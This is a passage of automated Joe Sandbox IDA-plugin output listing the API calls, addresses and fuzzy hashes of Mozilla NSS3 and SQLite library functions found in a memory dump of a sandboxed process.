                                                            • Instruction Fuzzy Hash: BA11D679A012149FD700EF24DC44A9A3778EF49368F598464ED4887711E731ED94CBE0
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CA5F0AD,6CA5F150,?,6CA5F150,?,?,?), ref: 6CA5ECBA
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CA5ECD1
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CA5ED02
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CA5ED5A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                            • String ID:
                                                            • API String ID: 2957673229-0
                                                            • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                            • Instruction ID: 6fd744f188e85a353ae7fb8769420afd0df3f2af7a64152c9e2a1ed7965227b6
                                                            • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                            • Instruction Fuzzy Hash: B32184B2A007425BE700CF26D944B62B7E4BFA5348F15C216E81C87A61E774E5E4C6D1
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EDD4
                                                            • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EDFD
                                                            • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EE14
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • memcpy.VCRUNTIME140(?,?,6CA79767,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EE33
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                            • String ID:
                                                            • API String ID: 3903481028-0
                                                            • Opcode ID: 113a2e29b065bc574e155eaa2be2862ac6102891e400aa71c2c28c5262608cd4
                                                            • Instruction ID: 2f2fd4e65c3be496bd6ad0228a4a4838f78b7a06e6510f4d53682956c0a74f75
                                                            • Opcode Fuzzy Hash: 113a2e29b065bc574e155eaa2be2862ac6102891e400aa71c2c28c5262608cd4
                                                            • Instruction Fuzzy Hash: D711A3B9A02706FBE7109E65DC84B46B7A8FF0435DF244531E919C2A00E331E4A887E1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                            • String ID:
                                                            • API String ID: 284873373-0
                                                            • Opcode ID: 6874431c542f1cfd62584150f9453480cac80a27dd66cf22ae56f979655b2b40
                                                            • Instruction ID: 7788d0af56cff3e790814e7aa9a7227bc1ea433b814e8ab707b68242e82faf04
                                                            • Opcode Fuzzy Hash: 6874431c542f1cfd62584150f9453480cac80a27dd66cf22ae56f979655b2b40
                                                            • Instruction Fuzzy Hash: 9D114F75A05A159FD700AF78C5446A9BBF4FF05714F054969EC8897B00E734E894CBD1
                                                            APIs
                                                            • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CA95F17,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAAC94
                                                            • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CA95F17,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAACA6
                                                            • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAACC0
                                                            • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAACDB
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$DestroyFreeK11_Monitor
                                                            • String ID:
                                                            • API String ID: 3989322779-0
                                                            • Opcode ID: 5d7a10e947f1570dca33eece311cc852ffd963347acce3d43df6ccd86375ac59
                                                            • Instruction ID: ff735e56e40e9791ad1a1f52996f5c997617a520aca4737e6868327d2edb6bc5
                                                            • Opcode Fuzzy Hash: 5d7a10e947f1570dca33eece311cc852ffd963347acce3d43df6ccd86375ac59
                                                            • Instruction Fuzzy Hash: 8F019EB5601B01ABE750DFA9D908753B7E9BF04659B044839E85AC3E00E731F495CF90
                                                            APIs
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA11DFB
                                                              • Part of subcall function 6CA095B0: TlsGetValue.KERNEL32(00000000,?,6CA200D2,00000000), ref: 6CA095D2
                                                              • Part of subcall function 6CA095B0: EnterCriticalSection.KERNEL32(?,?,?,6CA200D2,00000000), ref: 6CA095E7
                                                              • Part of subcall function 6CA095B0: PR_Unlock.NSS3(?,?,?,?,6CA200D2,00000000), ref: 6CA09605
                                                            • PR_EnterMonitor.NSS3 ref: 6CA11E09
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90AB
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90C9
                                                              • Part of subcall function 6CAC9090: EnterCriticalSection.KERNEL32 ref: 6CAC90E5
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC9116
                                                              • Part of subcall function 6CAC9090: LeaveCriticalSection.KERNEL32 ref: 6CAC913F
                                                              • Part of subcall function 6CA0E190: PR_EnterMonitor.NSS3(?,?,6CA0E175), ref: 6CA0E19C
                                                              • Part of subcall function 6CA0E190: PR_EnterMonitor.NSS3(6CA0E175), ref: 6CA0E1AA
                                                              • Part of subcall function 6CA0E190: PR_ExitMonitor.NSS3 ref: 6CA0E208
                                                              • Part of subcall function 6CA0E190: PL_HashTableRemove.NSS3(?), ref: 6CA0E219
                                                              • Part of subcall function 6CA0E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA0E231
                                                              • Part of subcall function 6CA0E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA0E249
                                                              • Part of subcall function 6CA0E190: PR_ExitMonitor.NSS3 ref: 6CA0E257
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA11E37
                                                            • PR_ExitMonitor.NSS3 ref: 6CA11E4A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                            • String ID:
                                                            • API String ID: 499896158-0
                                                            • Opcode ID: 800d41ba8f5d3a9b7bdc0c484f1cba7ffee47c64dd7b0b1a9b760e57ede799c2
                                                            • Instruction ID: f72e4694e7c05f36da684923a4af1c01d74f8272217e2d2593cd68bbc58776c2
                                                            • Opcode Fuzzy Hash: 800d41ba8f5d3a9b7bdc0c484f1cba7ffee47c64dd7b0b1a9b760e57ede799c2
                                                            • Instruction Fuzzy Hash: D401F771B4815097EB005AA6ED40F727774AB61B4CF140031E61897FD1E731EC98CBD6
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA11D75
                                                            • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CA11D89
                                                            • PORT_ZAlloc_Util.NSS3(00000010), ref: 6CA11D9C
                                                            • free.MOZGLUE(00000000), ref: 6CA11DB8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$Errorfree
                                                            • String ID:
                                                            • API String ID: 939066016-0
                                                            • Opcode ID: 7c396a72df24c689a7289c5c8b68453f3c29bb9c77cf771e794639c3ee532bc5
                                                            • Instruction ID: 664b42d2e2b248db5eb62e3d54d83a2ba8b76157c56f9677b8f1eb2ec9328042
                                                            • Opcode Fuzzy Hash: 7c396a72df24c689a7289c5c8b68453f3c29bb9c77cf771e794639c3ee532bc5
                                                            • Instruction Fuzzy Hash: 12F049B261962057FF101E5AAC41BA73658DFA1B88F150235DF1847F40D620E4C4C2E5
                                                            APIs
                                                            • PK11_FreeSymKey.NSS3(?,6CA95D40,00000000,?,?,6CA86AC6,6CA9639C), ref: 6CAAAC2D
                                                              • Part of subcall function 6CA4ADC0: TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE10
                                                              • Part of subcall function 6CA4ADC0: EnterCriticalSection.KERNEL32(?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE24
                                                              • Part of subcall function 6CA4ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CA2D079,00000000,00000001), ref: 6CA4AE5A
                                                              • Part of subcall function 6CA4ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE6F
                                                              • Part of subcall function 6CA4ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE7F
                                                              • Part of subcall function 6CA4ADC0: TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEB1
                                                              • Part of subcall function 6CA4ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEC9
                                                            • PK11_FreeSymKey.NSS3(?,6CA95D40,00000000,?,?,6CA86AC6,6CA9639C), ref: 6CAAAC44
                                                            • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CA95D40,00000000,?,?,6CA86AC6,6CA9639C), ref: 6CAAAC59
                                                            • free.MOZGLUE(8CB6FF01,6CA86AC6,6CA9639C,?,?,?,?,?,?,?,?,?,6CA95D40,00000000,?,6CA9AAD4), ref: 6CAAAC62
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                            • String ID:
                                                            • API String ID: 1595327144-0
                                                            • Opcode ID: 1d6fd07665c6134f787d537ecce0bd6a8e27dafd6a1e1b30f3f5dba625714dd9
                                                            • Instruction ID: f7d1260355342191a60a82e58f460eec3fc030421fef678eab8ff5e35e58ea6b
                                                            • Opcode Fuzzy Hash: 1d6fd07665c6134f787d537ecce0bd6a8e27dafd6a1e1b30f3f5dba625714dd9
                                                            • Instruction Fuzzy Hash: 8C014FB56006049FEB00DF95E9C0B46B7E9AF44759F188068E9498F706D731EC89CFA1
                                                            APIs
                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA09003,?), ref: 6CA5FD91
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PORT_Alloc_Util.NSS3(A4686CA6,?), ref: 6CA5FDA2
                                                            • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CA6,?,?), ref: 6CA5FDC4
                                                            • free.MOZGLUE(00000000,?,?), ref: 6CA5FDD1
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                            • String ID:
                                                            • API String ID: 2335489644-0
                                                            • Opcode ID: d235d507dd32ff6ed98a084240756c08a4d19c81ce2e5e11ab41a53430c27267
                                                            • Instruction ID: b10bd88766d57243caa595f8e4170d9e468b9dc48b70c424e064abd7fb93c4eb
                                                            • Opcode Fuzzy Hash: d235d507dd32ff6ed98a084240756c08a4d19c81ce2e5e11ab41a53430c27267
                                                            • Instruction Fuzzy Hash: BEF0C8B66022425BEB005F55DC809177758EF5529DB58C038ED09CBF02E731D8A4C7E1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalDeleteSectionfree
                                                            • String ID:
                                                            • API String ID: 2988086103-0
                                                            • Opcode ID: 816fc2974e2e48c9016438b8d3cad2f4e4541b6f7fc4288691383462aa26691f
                                                            • Instruction ID: 20fcb8fc9a4bff055c81be8a781991de9ceaf27ce8ea3ed5b86bb1c1b1605430
                                                            • Opcode Fuzzy Hash: 816fc2974e2e48c9016438b8d3cad2f4e4541b6f7fc4288691383462aa26691f
                                                            • Instruction Fuzzy Hash: 7EE03076B006089BCA10EFA8DC4488677ACEE4D2707150525E691C3700D231F905CBA1
                                                            APIs
                                                            • sqlite3_value_text.NSS3 ref: 6C9F9E1F
                                                              • Part of subcall function 6C9B13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C982352,?,00000000,?,?), ref: 6C9B1413
                                                              • Part of subcall function 6C9B13C0: memcpy.VCRUNTIME140(00000000,6C982352,00000002,?,?,?,?,6C982352,?,00000000,?,?), ref: 6C9B14C0
                                                            Strings
                                                            • ESCAPE expression must be a single character, xrefs: 6C9F9F78
                                                            • LIKE or GLOB pattern too complex, xrefs: 6C9FA006
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memcpysqlite3_value_textstrlen
                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                            • API String ID: 2453365862-264706735
                                                            • Opcode ID: af2b974f302d6c1e2ce874b5d46168a1791915c73ca95cb81fc400fe9c295ee8
                                                            • Instruction ID: 8825ab2f8f8fe284c61f9e02eda7aee5e277a4a21eecabfe34f7cd83d414b5e2
                                                            • Opcode Fuzzy Hash: af2b974f302d6c1e2ce874b5d46168a1791915c73ca95cb81fc400fe9c295ee8
                                                            • Instruction Fuzzy Hash: E7813D30A042518BE700CF39C4803A9B7F6AF8531CF2A8659D8B98BB81D732DC47C791
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA54D57
                                                            • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CA54DE6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ErrorR_snprintf
                                                            • String ID: %d.%d
                                                            • API String ID: 2298970422-3954714993
                                                            • Opcode ID: 27301257d4192a18aebcf5828d0514daa93cde53f80cb3b735015dbe62d83e01
                                                            • Instruction ID: 14a6a7d1452c3bdf787414603d29b82677bea9b2de9e48d22e3c1c786947bef0
                                                            • Opcode Fuzzy Hash: 27301257d4192a18aebcf5828d0514daa93cde53f80cb3b735015dbe62d83e01
                                                            • Instruction Fuzzy Hash: 9431FCB2D042586BFB109BA19C05BFF776CDF40308F454469ED199B781EB309969CBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$calloc
                                                            • String ID:
                                                            • API String ID: 3339632435-0
                                                            • Opcode ID: d314520e47005a2e3989d97a6946b9ef8001ff3704cd7ab098d235e2412586a7
                                                            • Instruction ID: ad7c27b0ff039329f71bab8fdfaefd74f961e9102366a9062dc1f31af27d5d51
                                                            • Opcode Fuzzy Hash: d314520e47005a2e3989d97a6946b9ef8001ff3704cd7ab098d235e2412586a7
                                                            • Instruction Fuzzy Hash: D531E4716443A1CFEB006F3AC9842697BB8FF1A308F054669D89887E61EB34D0D5CB86
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: ed8a5f3697bd95c2cc7e0ccc6caf95d04cdb0a2a7bba051966be2a4e1389c9a5
                                                            • Instruction ID: aebeb7e94e6599cebccb3374db93ec0b81c7d2b7af9d25b29753546fdbe77225
                                                            • Opcode Fuzzy Hash: ed8a5f3697bd95c2cc7e0ccc6caf95d04cdb0a2a7bba051966be2a4e1389c9a5
                                                            • Instruction Fuzzy Hash: 9EF0B4B57045016BEB009F65DC45D37777CEF45594B080425ED09C3E00D725F450C6A1